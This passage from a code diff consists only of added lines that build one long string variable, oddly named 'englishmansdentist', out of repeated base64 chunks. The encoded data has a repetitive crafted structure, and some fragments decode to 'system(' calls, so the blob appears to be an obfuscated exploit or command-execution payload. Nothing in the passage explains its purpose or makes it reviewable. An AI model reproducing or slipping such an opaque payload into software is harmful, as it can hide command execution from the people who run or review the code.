+    englishmansdentist+="P1ZR+H0lOYs8lLQtjpbz4TXka/HzEEHIKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAA" + "\r\n"
+    englishmansdentist+="AxUAoQBkAQBQUE5UABEATWVSaEcxz4/ZwvgscWyhmxkPehqoB1E0A4tg/RXMve3y" + "\r\n"
+    englishmansdentist+="wGm7xHoVPt38FZm+cZ/FP5/JpsOaUtaggbtSn0fhGMFrShArXI4wZM0cKth1gbSz" + "\r\n"
+    englishmansdentist+="ecar/T3IHEyHLnKc6wHh5WFmVOPWiigAAAAAAAMVAKEAZAEAUFBOVAARAE1IjL2d" + "\r\n"
+    englishmansdentist+="30xwSCCBBd6WtZw7jhsg5zVG9IaN5jD6CdGARC2DziKqhQh2avjbk7+A9UB6y4XF" + "\r\n"
+    englishmansdentist+="3DZ4wEKGaw+JUZmJ6Q3H82tTkb2RKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUA" + "\r\n"
+    englishmansdentist+="oQBkAQBQUE5UABEATWV24w6EvD+/LY2AlqTbpZNu93+J1kik1+Dtn3sk5bxYHZ9U" + "\r\n"
+    englishmansdentist+="8DyjBE4hO8N4cL8sMbyA6Uatx7Y4LhbNiaAXO2/ZUuZIAxnYbRLRju70EMC0HIum" + "\r\n"
+    englishmansdentist+="g46F5qE3lVdXemnHD9uJ4IK/iygAAAAAAAMVAKEAZAEAUFBOVAARAE1IqFyHDHqm" + "\r\n"
+    englishmansdentist+="66mdJh/GqEHkxeRY76OrwYYMBCcvgWsOgCSHNelch1u/z+giW0KSyIBk6jPkbL0l" + "\r\n"
+    englishmansdentist+="H3i4IqxzSMSDpI8OzJpxgCtuKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBk" + "\r\n"
+    englishmansdentist+="AQBQUE5UABEATWUXgTtUL9PGR0elL8lYF5KuBI1Mm5TdNoFGnFKn13dOW/UfeBCF" + "\r\n"
+    englishmansdentist+="hZgQUu1hQi28umIDRb0x7sCqwdSfgKuCJroo+de0zseEPikKTfadG73WE4QrmLEi" + "\r\n"
+    englishmansdentist+="WV0zEdlIFWP4YjpDlXk0jCgAAAAAAAMVAKEAZAEAUFBOVAARAE1IVQNlxRcLVvIk" + "\r\n"
+    englishmansdentist+="UJID9StY5BoaL2tyHoGdk+akuJNGPCmqtSfgx3fIn3gs/D5yOmTW6f5uyCM77ERR" + "\r\n"
+    englishmansdentist+="cEeWXeFU3XjfAkAY7IVCKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQ" + "\r\n"
+    englishmansdentist+="UE5UABEATWVrk5Gau1AI3tSRzHfoEjFQB5h0ibFmBc2LSNhpoc6myXhRLrU9cnyZ" + "\r\n"
+    englishmansdentist+="QtZjYjqH31JD78EWUtl2vOBCArGwhDJrRLge8wOs4Ou6aLk/MIhuIMGNL4KfT7qu" + "\r\n"
+    englishmansdentist+="naIuNDF9D56boBCAjSgAAAAAAAMVAKEAZAEAUFBOVAARAE1IyhM2Bvlgto+QCkHb" + "\r\n"
+    englishmansdentist+="YA0f3KrczfsHyn/QuzUXLXNwIFL2vnBb3GOul8YLm+splF0GKZ+SOpShfDeRLgMd" + "\r\n"
+    englishmansdentist+="6A7KJ47TYalqnF1nKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5U" + "\r\n"
+    englishmansdentist+="ABEATWXljLADTdUkl3XB0E3cmxbYme92xD/tAYBEfcj40MLj1qmhmRQjBQv7mHE7" + "\r\n"
+    englishmansdentist+="W6atn+1jDf7A4wwMrXDuTJVmEdCEdltTYyzdGGZA4mza2FrZfCUcFPNt5afBF2V5" + "\r\n"
+    englishmansdentist+="FqpMFdNW2cR1jigAAAAAAAMVAKEAZAEAUFBOVAARAE1IE6y7zL5b44OIpexLv8AM" + "\r\n"
+    englishmansdentist+="iZSK9ZvfIshXQr4L9/xAwxyjPMfxFh8RWOslZvC5pC31P4mB3hxulYD9QHbmxb0D" + "\r\n"
+    englishmansdentist+="bdnge13me0GfKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEA" + "\r\n"
+    englishmansdentist+="TWVs7D/FQ3ii9Xn8N/XGoif90imAXLeFJszVfXpgg8uv7pCh0+4184ONeYpwHIAX" + "\r\n"
+    englishmansdentist+="q4bfYMHheNWx3d900BbdbH4hCWfsVg3axweaWPFIky43F2xQMMZg8xiSarbzWZXH" + "\r\n"
+    englishmansdentist+="tlWz77ivjygAAAAAAAMVAKEAZAEAUFBOVAARAE1I8fRX82Ic4kHvVcr15e4xIWou" + "\r\n"
+    englishmansdentist+="siMMuMXY7UlO8pJ0znC2FPo1fQ3RkjL9SrLjuYzOONm+DoN7hQXXaRuvzrMx4c8S" + "\r\n"
+    englishmansdentist+="aOu97buTKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWY" + "\r\n"
+    englishmansdentist+="poYfJrF6dxRTZBu8geES5Kjghbz3Qg9ezz2DIw4BXw7NM12OZZKI9f21WsXb7wVY" + "\r\n"
+    englishmansdentist+="jUu01RHRxCk1+K/OOmrYJQbrzjDo1jt2TKkj2R8tpBKo6Ma8VhihnzYMcBLLJ7MW" + "\r\n"
+    englishmansdentist+="2D0mkCgAAAAAAAMVAKEAZAEAUFBOVAARAE1IP9e3jNmtIRlYa36CoI42jTyotAra" + "\r\n"
+    englishmansdentist+="yccEXarQXMDokFYbVwRDDKPiHsZkNPY835QlRXCsJpjzavZPPWkWstg8m0oU8+6e" + "\r\n"
+    englishmansdentist+="sZ5mKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXaPfsk" + "\r\n"
+    englishmansdentist+="v0ZN6/WdcedAuRghqXZZ3x1Rfn98QTLoz2XuZ2qm9/Gzb5OPjqjXDuQy2Zlc0XOM" + "\r\n"
+    englishmansdentist+="1Ad/zYSYwkuBVFHhduGtEUQSg/15kCIXOnCmyHtP7atgs0ubZ2Qe/UIdL9wntQj4" + "\r\n"
+    englishmansdentist+="kSgAAAAAAAMVAKEAZAEAUFBOVAARAE1IResadUng9FCfmVpXQ3tsnuUf2ElGbR2y" + "\r\n"
+    englishmansdentist+="QWPXqsxtXew2x0Rzuqdfyx/UtToXZveHOxAHe3AIAtxb0YTg4ONo9Tty08Gsfddm" + "\r\n"
+    englishmansdentist+="KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVlV2qqhK3+" + "\r\n"
+    englishmansdentist+="UtNblx1dEHe9FiVSYAR0UeEjwoR1LoE/vs1XCC89cFy219k/Z6vqkFyaFE5Q/Qej" + "\r\n"
+    englishmansdentist+="TGKb9OVsXdxCVRcLlCNbUi4NdY3XIoXKg79kZB7AB1WVGeCyt8ZDXSSk3tnrkigA" + "\r\n"
+    englishmansdentist+="AAAAAAMVAKEAZAEAUFBOVAARAE1IOJ+GAuQTBjSwUwrN/OZthmJrweQKhC7PvOjY" + "\r\n"
+    englishmansdentist+="XwwBvZKo9gw7eqgLiGpRlJl4biqEJrWwLaN6wGb5j9C1f9TsLcejXa2MMOosKAAA" + "\r\n"
+    englishmansdentist+="AAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWPASEN+9lDZHDp" + "\r\n"
+    englishmansdentist+="TST7xazuUPwqsKC+g6UWc1r6iq/cu4ZyyBf9Dkew1pYsT85rHjG7hTKmuCeEMDKz" + "\r\n"
+    englishmansdentist+="SoR+LgEf3zgPbZj0rkcS0ErwhHokMWABoq+2fttH7UDgdyfEWoJQb9+RkygAAAAA" + "\r\n"
+    englishmansdentist+="AAMVAKEAZAEAUFBOVAARAE1IjojbRfs6DiEqDbpGg8yZry89XrM9fjbI44jWXLS5" + "\r\n"
+    englishmansdentist+="j8ZMxBMPpPVEs3E+wgWb0ZxRZOXIejxUyjXAoU1rF0fTH+Othlo6siNLKAAAAAAA" + "\r\n"
+    englishmansdentist+="LGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWW7OAhRQ4KdBT4Du/Qr" + "\r\n"
+    englishmansdentist+="NodDbTl7sqPJ1nATUU8cEqhEURAqO1g81fMKSiXHvXsgvj1CgAmBsX0fWDzGa5Ov" + "\r\n"
+    englishmansdentist+="lK/0GEn2h21OW1/B4ly1wZEpOUO3gm6/KqA/aSfCSLy9zjAr1ryYlCgAAAAAAAMV" + "\r\n"
+    englishmansdentist+="AKEAZAEAUFBOVAARAE1I7+/70oPg2Qy4lOcVFyBfV3QYtVNSmycMCPF8w0Ya9Y/7" + "\r\n"
+    englishmansdentist+="T2jzGsaENEW8g3ERBPtgnhwlik1ST/OIh/I3EGL3tvJ/kyKuSIPmKAAAAAAALGQA" + "\r\n"
+    englishmansdentist+="lgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWV1KOu/LbSg9zWTFaRjetpk" + "\r\n"
+    englishmansdentist+="YlzV3dMI951fKNx7HhvuLHlyfDQJk3bUVGQaKjxYVAHa1zTNiWceIPJqDuvjBMBM" + "\r\n"
+    englishmansdentist+="ssb1x+/8mvNF9jBkLC4qumXlgejN6G1ei/pUKi3G3tyl235ElSgAAAAAAAMVAKEA" + "\r\n"
+    englishmansdentist+="ZAEAUFBOVAARAE1I02MFnHVDuW8wR7HJmQGc2OX63cMrE0SrxDwVuPnprDRLNZ5a" + "\r\n"
+    englishmansdentist+="esSDKuf5Mqw2IsgOvxpG/vhu4bQkNxcGibNz653sNQUWfr43KAAAAAAALGQAlgAG" + "\r\n"
+    englishmansdentist+="c3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWjqMwtJ9KyvvC/aBBKWJFSaJ5+" + "\r\n"
+    englishmansdentist+="Lk+AOImtEoC3LPoIClaxk1p6JHLwuHTwMZifIlheV9HlbyfA7hMsG9rKVF/Tmod/" + "\r\n"
+    englishmansdentist+="imikg2n5yW/vhp7MXHBVfyk0/UHMBc+MHiwiM5qxmnFhligAAAAAAAMVAKEAZAEA" + "\r\n"
+    englishmansdentist+="UFBOVAARAE1IU3rIuEJVXyDdNS7DuY/WORXqUJVimkNxqYpUIIpsMMDBSZM7yLQi" + "\r\n"
+    englishmansdentist+="2JXJTrn1Chemr1XviLcslBfNOP3ytoBq3mc+lA9slAN8KAAAAAAALGQAlgAGc3lz" + "\r\n"
+    englishmansdentist+="dGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXCTpowkctjQsQwi6c4M7+RRmHTbnNk" + "\r\n"
+    englishmansdentist+="uC8ZDuocrZ4ytKk77eOW5cYpRPfvv7df6rHnweGroa2fc9n6HBW+jclxto+EVsF1" + "\r\n"
+    englishmansdentist+="N7tBq1lnvW4ijbKbm5XP+H+x0MgXcnIfzu971AfTlygAAAAAAAMVAKEAZAEAUFBO" + "\r\n"
+    englishmansdentist+="VAARAE1IcJePqPXXaPlwI16Bzr/a2DHsrzxPxix1SBoosa8bgWyneJLlzI4jnaJK" + "\r\n"
+    englishmansdentist+="ezOHf97snTZkqM/MGyZlT6p/PPht+xxH76xOafxAKAAAAAAALGQAlgAGc3lzdGVt" + "\r\n"
+    englishmansdentist+="KAAAAAAAAxUAoQBkAQBQUE5UABEATWXNsz+PVbRZEZyHvNjtNQhUlZYMbCSSqSci" + "\r\n"
+    englishmansdentist+="PTh/L4rQkRQ+WM/VyVtMWqLD8njqgJlSzPHOno1+Vbid6CxLnd4UPMldbdGmX22k" + "\r\n"
+    englishmansdentist+="S2hmW1Z6WbTZ5koIGpm7ia5mxanRzAq5R8sxmCgAAAAAAAMVAKEAZAEAUFBOVAAR" + "\r\n"
+    englishmansdentist+="AE1INcFFCfxNguyvdFO3hK9byNvwEFbjxfyoduavf6eiDCoYFV1/hn/ShLe+y6kv" + "\r\n"
+    englishmansdentist+="RKd/y1Jj4r0533cFG/tLxN1nqLcmVvcLvAF2KAAAAAAALGQAlgAGc3lzdGVtKAAA" + "\r\n"
+    englishmansdentist+="AAAAAxUAoQBkAQBQUE5UABEATWXZPhjlyZIS4aQHe/G3bSwg0DmZCn31GVF9A09j" + "\r\n"
+    englishmansdentist+="++2bU6l/xu0UqMG2Z16j0xnH4dOBk8oe3/o6BfE9xnN4/Rzt3ZvXC3CTxwQyMpik" + "\r\n"
+    englishmansdentist+="0LryEd8GRrWoAtXy0vGsqUPj4W1YLa9LmSgAAAAAAAMVAKEAZAEAUFBOVAARAE1I" + "\r\n"
+    englishmansdentist+="7GgiH07hc0R4wTOa4/AgxTof1ZD5xlJQxpo1NB9cHYtCSa+fM1a+YE1bWHmqQNoM" + "\r\n"
+    englishmansdentist+="mXsUnXHjcG8ZLEjyY9VUaspbO2h3/mlqKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAA" + "\r\n"
+    englishmansdentist+="AxUAoQBkAQBQUE5UABEATWU5Ew0HdmRjDXs/Sx5jBSzg754vo3/T71CNzXaj3dLJ" + "\r\n"
+    englishmansdentist+="ncl42NixWgYUOZ8jXytgD0a2Du2D8BH2bTba/MJTV5/8Nicx2PWffTnS2Cj4Q7sQ" + "\r\n"
+    englishmansdentist+="A3OSahxl1Ni9Hb9Qf+eOEVFgvHQwmigAAAAAAAMVAKEAZAEAUFBOVAARAE1I+kTr" + "\r\n"
+    englishmansdentist+="VPQq0MdVZYZF3FVzPansZf48wtfY2AysMs3m41Cq1tcN7eJ+8C4vNghLgMP7tbLd" + "\r\n"
+    englishmansdentist+="ujw26B2H52nzrlSu9w90NdC4VnPjKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUA" + "\r\n"
+    englishmansdentist+="oQBkAQBQUE5UABEATWXBdEoGw036vKsB5ENrb77cfcKovtu94ytZvFzT9dzeVjYd" + "\r\n"
+    englishmansdentist+="VMb09aAl0z6Jr7vKd+9uxDB80uWDM+raCxPw29ZDyZNTmi3AJCSeWkDhzLUfeDSc" + "\r\n"
+    englishmansdentist+="L9u8lnGlR4NuUpq9W/Lwy6iXmygAAAAAAAMVAKEAZAEAUFBOVAARAE1Iavnd76bK" + "\r\n"
+    englishmansdentist+="44HjnaXkz4U8XWmgd18Z6xgejfVN8kBCHZxR+BAOqY29/u/16N9vPFZCTdlOgTXb" + "\r\n"
+    englishmansdentist+="+s0IAYEbdfzlUS0a3kGQK3eXKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBk" + "\r\n"
+    englishmansdentist+="AQBQUE5UABEATWWEQ6hoZgzjkIsqi3qZmoB79WCohHeGnSLuwFuba68nRuAJkL4q" + "\r\n"
+    englishmansdentist+="wrYh6XW2+mv3ag7on2KYV/FJRzZdf3J1sUrV6dYxbF+7BIvXrzwC9FXtMBpTNgRG" + "\r\n"
+    englishmansdentist+="3lDAQmQtaQ5OxdcsSANDnCgAAAAAAAMVAKEAZAEAUFBOVAARAE1I0dVpNm7Rb9Gr" + "\r\n"
+    englishmansdentist+="kKJZaxeRu6Zwh1QCUyZlujDkpd32a11yd+9Ga9yM9S8Ti8NljMcB/VAqjgarIJYw" + "\r\n"
+    englishmansdentist+="gWBf3I2yG16UCLE22bhEKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQ" + "\r\n"
+    englishmansdentist+="UE5UABEATWU+zg91OV8cVf212sqN/q52RvlR7K66CijToYU239n71MhDATvCRK+H" + "\r\n"
+    englishmansdentist+="eF2kJXjiV8P610ACfjaOdkSjqk8h9VAP4W2WqoP0lK5uifqFVfB9hXnhFhMovD5A" + "\r\n"
+    englishmansdentist+="Oh0bUFZTjpvJ2XQfnSgAAAAAAAMVAKEAZAEAUFBOVAARAE1IojW7KgcIuJhU03MN" + "\r\n"
+    englishmansdentist+="EmUtYyIZCQR1JOVFiBZ5cuCaob3x0QqajSsj1Fc1cPE8OT76lRi4jtVMhwxpcL7L" + "\r\n"
+    englishmansdentist+="tkmQc+yZPvN8z+B9KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5U" + "\r\n"
+    englishmansdentist+="ABEATWXayJISmLpvrE+TD/BpuNdGTJ3xLvsKGvWzbg1ncF0Ilg5P5Zbv0k8Qxmep" + "\r\n"
+    englishmansdentist+="hV8QI2Az3pFjkYN8whEuCHUwvBPtwI5Y7jTr0YQYfxTtFYQWisZ8/X576WYbdsWu" + "\r\n"
+    englishmansdentist+="36lk4x12UMLUnigAAAAAAAMVAKEAZAEAUFBOVAARAE1IfANUNQbGwRMLy8fDU8eH" + "\r\n"
+    englishmansdentist+="3eL64w76LGi6807Gf0pr5EYKjZoSBDcJJ+gsucvSG1wkH/NwcGNXflhO/m4/Db1n" + "\r\n"
+    englishmansdentist+="i0SX088izTGiKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEA" + "\r\n"
+    englishmansdentist+="TWWHZM8u5NWcO6qj6d8YSy5UH4X1Ry8t1zO6rpX2IJNdSt7MWTzOZUxZL1mevysX" + "\r\n"
+    englishmansdentist+="kJn0deFRzqSwFyzo2Mtkl6UnEToRE4M2V/px7jw9VMqsUoXnHN2tHFFWceIGYPnw" + "\r\n"
+    englishmansdentist+="AopoDRKTnygAAAAAAAMVAKEAZAEAUFBOVAARAE1Il8CQ32vI2k30gXD0r4b0MDeP" + "\r\n"
+    englishmansdentist+="A1iXxemMmL5VDFYu42lOjbMbOs4BrBphtD96eCxXgQTwysw+t++eKmeReA93CYkh" + "\r\n"
+    englishmansdentist+="ZvYedI/eKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVw" + "\r\n"
+    englishmansdentist+="kzQ4FHThLEeJO6tqghD0EWDqQo+mIqreCjUYhbbeNlZLlCzStqJM5zHZNvFQ8c2b" + "\r\n"
+    englishmansdentist+="mn2PhnKkUYHlkF0JE6S+y8RlsTYDYR1zG7ruDu3RcZMUnTZugiXIU1XZ8V6YAVx5" + "\r\n"
+    englishmansdentist+="Qh6moCgAAAAAAAMVAKEAZAEAUFBOVAARAE1I4aV3z5tqq62KLYCg+Bm0M4ZeMaXa" + "\r\n"
+    englishmansdentist+="BFFPcNR/sLARGjGpc6hcv09lhGJhO+Vx9RbUKyTCQUebIytH5hIqbIKhvoDIIHzd" + "\r\n"
+    englishmansdentist+="+4bVKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWW0aKeQ" + "\r\n"
+    englishmansdentist+="SAL8q+hzOLty3GSJF24M+0zy3waFiXO8o6+WSsyp0rhznouQdXFVA9eHErtClDMk" + "\r\n"
+    englishmansdentist+="m8PtA/4jmmhlsQrLGRMxQZIyyKWo0U3Io2IQT0cNsGVLY8j6XIj3lx5MM5ozG6DS" + "\r\n"
+    englishmansdentist+="oSgAAAAAAAMVAKEAZAEAUFBOVAARAE1I6SupVYbKtYiiPyYl0xMUUfJDVn01N1gq" + "\r\n"
+    englishmansdentist+="cdNWL9i+Ztlm/ghQNx+Mg075Dl2/Z1g22N9mYUMw8MGpp5lW9YYulZ80pZEPEzvH" + "\r\n"
+    englishmansdentist+="KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXCcmJlBVba" + "\r\n"
+    englishmansdentist+="NuK6q8BxBVjSvC8PHZyADgPPSSpdh3qOJMmQpe/Hr2Yzo2HDBs3FlJNG0qva/kCD" + "\r\n"
+    englishmansdentist+="6t3RKzZFrb0200lF+lTPL9tVYzvbjxER/ogLUTSF53TfW2ci9BOKaV/2kJLIoigA" + "\r\n"
+    englishmansdentist+="AAAAAAMVAKEAZAEAUFBOVAARAE1II5jIo9hfeDkTC57gbVTGC7EdKzp3o22w3nqX" + "\r\n"
+    englishmansdentist+="y/RszeTLczrHtvjWW95dd8OMNL6ROQtdGhQ0XMnFbbVtM+IZJRZU5Uwi2ZDHKAAA" + "\r\n"
+    englishmansdentist+="AAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWjQEICHDfOQO9q" + "\r\n"
+    englishmansdentist+="K2m0wRztDtyg/cALfqHqs6EB8rTPTjhtCrcG9HnU23oV1YcJyg0dyI8CVvXzwmWT" + "\r\n"
+    englishmansdentist+="pnauSJ8Clyo+y88JJVkg/AvcYsdpXYi7McNVyFcxuX+SDXlU9ELrQrvuoygAAAAA" + "\r\n"
+    englishmansdentist+="AAMVAKEAZAEAUFBOVAARAE1IsBchHxFGYLrBwt9lCMCOVr+vauBWinPmKaOxtIIL" + "\r\n"
+    englishmansdentist+="xpaEz6O5JynTe8zNBO2BcyCTTNbYDr5NtfEzDplG0F8LBM3l0gsCBYvtKAAAAAAA" + "\r\n"
+    englishmansdentist+="LGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVSvIsJ/fHGH018OD2p" + "\r\n"
+    englishmansdentist+="6jTiu2pbMXakljq1GrE7Zr8SrMNwGw+v6Mlkw9wFOvcPLjeNnozrPMfoCRYsNLlN" + "\r\n"
+    englishmansdentist+="xlwZQM49ovGD1JNYR6AZqedQNRqTqkEMOuQJY+wuPcUUyVqPyWKspCgAAAAAAAMV" + "\r\n"
+    englishmansdentist+="AKEAZAEAUFBOVAARAE1IRn0DqlgIWjTsNKnkdkAdPf360pfENGLHGSIeYBxW5F5Y" + "\r\n"
+    englishmansdentist+="F9FqvXljLxk1siBomzI2VI9p2wfZeJ+p9IXk/HIJN/kYJl8o+9n1KAAAAAAALGQA" + "\r\n"
+    englishmansdentist+="lgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWks09/WqseyHL+wsWZxgFV" + "\r\n"
+    englishmansdentist+="CyOUaPEq9O8mzVPZ2/y/vjkDwmlYfQHd5eJfCZvmcMD1u0s2XIi+mv0VC/bM6QQF" + "\r\n"
+    englishmansdentist+="n/rEDiMg3qFlVi0pzzAt/khfDV1Np12EzUxymY4+eInPBGpcpSgAAAAAAAMVAKEA" + "\r\n"
+    englishmansdentist+="ZAEAUFBOVAARAE1IF7GmiNL5fWifoHl8DjSosnajs0kKWwtsYnrYWuQENxZAUy9T" + "\r\n"
+    englishmansdentist+="Mv4N1iI7huVz507dOqaNyEizxt4yKMvKJmoRvE0zNgOwGPxOKAAAAAAALGQAlgAG" + "\r\n"
+    englishmansdentist+="c3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWUSEG8z1bOfRZndmy9QS/wviNjZ" + "\r\n"
+    englishmansdentist+="dfc5Sp2Zg2HqqIHWaM8wM6ayU6AYRYV37AikbGCiJXtB9+uczit+P52W/JSRa722" + "\r\n"
+    englishmansdentist+="xbMOvlCR1qO6hMc8O1yrCFbejystomdF+CLbifOT281fpigAAAAAAAMVAKEAZAEA" + "\r\n"
+    englishmansdentist+="UFBOVAARAE1IqbDMrX0aip39RflUPBvGLJK2eV5Zi88jF+59iKi4MI6LlAy5q6J9" + "\r\n"
+    englishmansdentist+="2ts2ngZ2I+J8HX5+zEU7KopskpkPqoh6r3uVHMZswrYKKAAAAAAALGQAlgAGc3lz" + "\r\n"
+    englishmansdentist+="dGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWkN4dw3HpvSrOCjqwH1H3lRaxxDEmI" + "\r\n"
+    englishmansdentist+="OG7BGA3rst1aAQ1yfYL042vitPBv/Oi54DHiqALO0/7Ytc4QVAwgWW7g65ut6+Ap" + "\r\n"
+    englishmansdentist+="ttile0SD3ldTsrV4qW9HObPCPOzNyvSk6BdK5bErpygAAAAAAAMVAKEAZAEAUFBO" + "\r\n"
+    englishmansdentist+="VAARAE1IdR0hCi9fpMuBH7r3VZ03zEeJChHHs7+eJDahU0wVhYAklVuYJ1mEKhGL" + "\r\n"
+    englishmansdentist+="5NeAGdyLH1QBal7l17w/j1uMSW+S9BN2BfCLuEi6KAAAAAAALGQAlgAGc3lzdGVt" + "\r\n"
+    englishmansdentist+="KAAAAAAAAxUAoQBkAQBQUE5UABEATWV3IoluHHc0HsL1qt0LlSkqhTa/DLXFpV8E" + "\r\n"
+    englishmansdentist+="qJ7HgU20Y0dtQyQ2zEO1zeMBwwtVMKjZuGBTOnL5WWgclhVScQHPtwGYowe3cVaE" + "\r\n"
+    englishmansdentist+="jOG8ukbT0M+wuDmgVCtCW8xBIXUIwHatdfnlqCgAAAAAAAMVAKEAZAEAUFBOVAAR" + "\r\n"
+    englishmansdentist+="AE1I7VmWxM9yFK2mDmL3l74s1NfQQUiXt9h2h3n4lK9zviduX+eRRxhKyX7YjDwS" + "\r\n"
+    englishmansdentist+="hQGK/d2nYIXqguZMug8u8J8h6jr8DxAkDByIKAAAAAAALGQAlgAGc3lzdGVtKAAA" + "\r\n"
+    englishmansdentist+="AAAAAxUAoQBkAQBQUE5UABEATWUaX3SLwLZpBFTuPEA5dUmRrEbVDkuySgQn8BFh" + "\r\n"
+    englishmansdentist+="SOEHpnrfmpPVCoIyRwY7a2NxJNXDHYjKP2ZEhDF+Y2tDOnUwxR/uzCVATUxjrEgw" + "\r\n"
+    englishmansdentist+="aPzrZMnIxcD2fgrKgHPf3kS2tm9QbcV6qSgAAAAAAAMVAKEAZAEAUFBOVAARAE1I" + "\r\n"
+    englishmansdentist+="KRyz2GrveKBORWcvKF6VGETDdX5kIMwyKggFA5Ce3KMMcYeeOmw+ksR8P3Bkd2u2" + "\r\n"
+    englishmansdentist+="ng5PilVi06B3337FJxRYGpgVgq7eQXiwKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAA" + "\r\n"
+    englishmansdentist+="AxUAoQBkAQBQUE5UABEATWUk1gmtNTIgWCw0RCjtoAk2V/wp39uwxHVF5UhmjBVz" + "\r\n"
+    englishmansdentist+="X2qYQrJ7PfJ3sBrr0fXF4bueKfjDouUaFzDNX2acGNbSQQ1PkzfJjlehrsFRXEZJ" + "\r\n"
+    englishmansdentist+="zccpwieQqbAmH7g+lZAEvwvzgnmqqigAAAAAAAMVAKEAZAEAUFBOVAARAE1IlpID" + "\r\n"
+    englishmansdentist+="BhffL684H4PH9dlKC+Z2UZd8oTwpFRiqwYBS9Jvt18pV061/RsfPSNH1FDSzEFko" + "\r\n"
+    englishmansdentist+="IGCGm5j4HYCKgd7gVLxnw+VBG+euKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUA" + "\r\n"
+    englishmansdentist+="oQBkAQBQUE5UABEATWVwbK/bOr0StpjYx0OJbYimO2WMsj+SPgehjz0dbzGL08OE" + "\r\n"
+    englishmansdentist+="QJndxVzoPhIzSV1lEl/6xYlVq937L20u4CYYAmvhdDbgi6chcWrdnsdB44gzEYWf" + "\r\n"
+    englishmansdentist+="k1pbOOmQE6TK8p6td05kJeX4qygAAAAAAAMVAKEAZAEAUFBOVAARAE1I/cuZoYOn" + "\r\n"
+    englishmansdentist+="WQXa885WS9s1ZY8myTmw2n9FC1SE1Zd7DvD4zAg/WtgZNprPsBPo6lrtMS48fYpG" + "\r\n"
+    englishmansdentist+="4qAQIFN/P+94SFIwzz6+bKQ8KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBk" + "\r\n"
+    englishmansdentist+="AQBQUE5UABEATWUrS4VtHsVcLcvhyvIL3UlPB0eJmK2/r6BvDPPYMRwBSTec7NjV" + "\r\n"
+    englishmansdentist+="6/gnmtzuhMcpaGfuBLK3Z6yqXVh+XplYMZ1XGAVlEydlVqJ6vQNcfi1mx3SXR7oM" + "\r\n"
+    englishmansdentist+="BsCvwanaUgh5TSLFx1sYrCgAAAAAAAMVAKEAZAEAUFBOVAARAE1IScEHOfUxR+oU" + "\r\n"
+    englishmansdentist+="fsYT5lGgxXCcto4KviQYNEtNOOs7HzWcG/xBO+Pr7ZE4frVEgQ5Ih8+2uTLv2ksC" + "\r\n"
+    englishmansdentist+="hkPl1K/r+K8Qm90hkgZrKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQ" + "\r\n"
+    englishmansdentist+="UE5UABEATWUv+uTmKISy9XKCVLLje4SSto06R3iI4kIyyqb5Jv2Oq0jyu6Dgu6zO" + "\r\n"
+    englishmansdentist+="dSCLzneokt/DUak8cy0QLwH4Ukp07WlDYc8tqlyW9xr9n74h5cFfasNHb20IC2Iq" + "\r\n"
+    englishmansdentist+="G9UxSNs3ZBEnzcaOrSgAAAAAAAMVAKEAZAEAUFBOVAARAE1INoZ5Y6Z6t4rSHiWx" + "\r\n"
+    englishmansdentist+="dmzMSiaZteSwIEE10a4yNW+vhKOuBf1+LLWrrYgaE37BS3IPZVjLWRAg7B12N3Ae" + "\r\n"
+    englishmansdentist+="M77GBbOWQIxy3jP+KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5U" + "\r\n"
+    englishmansdentist+="ABEATWX9HDLguO51tgHPT8iypwPSkbygfJnLV5jQxdjvjApTscuQgS2S7k8R3o7Q" + "\r\n"
+    englishmansdentist+="vkAOufKTLjJQ7jVlDUIpVF2u0njGOOraCLFn5qiLLMwMfjGu3ZKEeNmn2IrS51cZ" + "\r\n"
+    englishmansdentist+="wzZbcQQrrQxUrigAAAAAAAMVAKEAZAEAUFBOVAARAE1ImwOL2z9Foslhfeq/TsGt" + "\r\n"
+    englishmansdentist+="pWMlyipQ94Fiq1Z89TlZvkUF6e/H1YSdWwbe24kw7vWK3giKFaeyzb687zz3oH2Q" + "\r\n"
+    englishmansdentist+="UcHYMVjVl+9pKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEA" + "\r\n"
